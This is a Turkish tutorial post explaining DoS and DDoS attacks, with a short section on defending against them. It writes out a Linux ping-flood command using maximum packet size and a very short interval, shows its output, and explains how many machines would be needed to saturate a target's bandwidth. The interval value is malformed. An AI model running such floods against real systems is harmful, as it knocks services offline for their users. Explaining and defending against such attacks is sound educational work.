Kısaca DoS saldırısı nasıl yapılır?
DoS nedir?
DoS açılımı ‘Denial of Sevice’ olan hizmet aksatma amacını güden bir saldırı yöntemidir. Sisteme düzenli ve sürekli olarak saldırılması sonucu sistemin hizmet veremez hale gelir.
DoS saldırıları iki aşamalıdır.
• DoS saldırısı yapacak olan sistemler hazırlanır yada ele geçirilir. Bu sistemlere gerekli programlar yüklenir.
• Hazır olan sistemler ile hedef sisteme saldırı başlatılır.
Aşağıda dos saldırısının resimli anlatımı bulunmaktadır.
Örnek DoS saldırısı:
Hedef sistemin 1 Gbps network bağlantısı olduğunu düşünelim. Ve örnekte verdiğim bilgisayarında bağlantı hızının 10 Mbps olduğunu düşünelim. Normalde Windows bir bilgisayarla ping ping attığımızda 32 byte büyüklüğünde 4 adet ICMP paketi atıyor. Ve toplam atma süresi başarılı bir durumda 3-4 saniye sürüyor. Buda saldırı sayılacak bir girişim olarak görülmez networkte.
ping 192.168.0.1
Pinging 192.168.0.1 with 32 bytes of data:
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 time
Reply from 192.168.0.1: bytes=32 timePing statistics for 192.168.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 2ms, Average = 0ms
Bu işlemi root hakkına sahip bir kullanıcı ile Linux da bazı parametreleri ekleyip yaptığımızda ICMP masum bir ping atma olayını çığırından çıkartabiliriz. Nasıl mı? –s komutuyla ICMP paketini 32 den 65535 çıkartarak ve –i parametresi ile de interval sayısını azaltarak iki ICMP paketinin arasındaki süreyi milisaniyeler seviyesine indirelim ve komutumuzu çalıştıralım.
# ping 192.168.1.1 -s 65535 -i .0.1PING 192.168.1.1 : 65535 data bytes
65535 bytes from 192.168.1.1: icmp_seq=0 ttl=64 time=0.582 ms
65535 bytes from 192.168.1.1: icmp_seq=1 ttl=64 time=0.655 ms
65535 bytes from 192.168.1.1: icmp_seq=2 ttl=64 time=0.471 ms
65535 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=0.554 ms
65535 bytes from 192.168.1.1: icmp_seq=4 ttl=64 time=0.580 ms
65535 bytes from 192.168.1.1: icmp_seq=5 ttl=64 time=0.835 ms
65535 bytes from 192.168.1.1: icmp_seq=6 ttl=64 time=1.171 ms
65535 bytes from 192.168.1.1: icmp_seq=7 ttl=64 time=1.054 ms
....... // Devamlı gönderilir..
65535 bytes from 192.168.1.1: icmp_seq=378 ttl=64 time=1.873 ms
65535 bytes from 192.168.1.1: icmp_seq=379 ttl=64 time=1.889 ms
Komutu çalıştırdıktan sonra gördüğünüz gibi bir kaç saniye içinde 65535 byte boyutunda 400’e yakın ICMP paketi gönderdik ve networkte yoğun bir trafik yarattık. Bu komutu uzun süreli çalıştırınca hedefteki sisteme erişim uzun bir süre erişimde problem yaşanacaktır. Gerçi örnekte verdiğim değerde bizim yaptığımız saldırı 10 Mbps büyüklüğünde ama hedefinde 1Gbps hattı olduğunu düşünürsek. Saldırıdan diğer kullanıcılar fazla etkilenmez. Tek başımıza bunu yaptığımız için bu DOS ataktır. Birlikten kuvvet doğar deyip, atak yapan bilgisayar sayısını 400’e çıkartalım. Bizimle birlikte 400 bilgisayar bunu yaparsa saldırının şiddeti okadar artar ve bu tür saldırıya da DDOS denir. 400 * 10 Mbps = 4 Gbps bir trafik denir ve buda bizim hedefimizdeki sisteme ait olan bant genişliğinin 4 katı. Bu durumda sisteme erişmek imkansız hale gelir.
DoS korunma yolu;
Bu tür saldırılar savunulması en zor olan DoS saldırılarıdır, bu sebeple ataklara neden olan paketler güvenliği sağlanılması istenen sistemin ağ geçidine girmeden bu paketlerin alımını durdurmaktır. Paketlerin ağ geçidine girmeden engellenme si için TCP SYN, UDP veya ICMP gibi aynı tür paketlerin arka arkaya geldiği takdirde takibini ve kontrolunu sağlayan yazılım kurulması gerekmektedir. Paketlerin bir ya da ikiden fazla farklı ip adresinden gönderildiği göz önüne alınırsa bu durumda İnternet Servis Sağlayıcısı’ndan destek alınması gerekmektedir.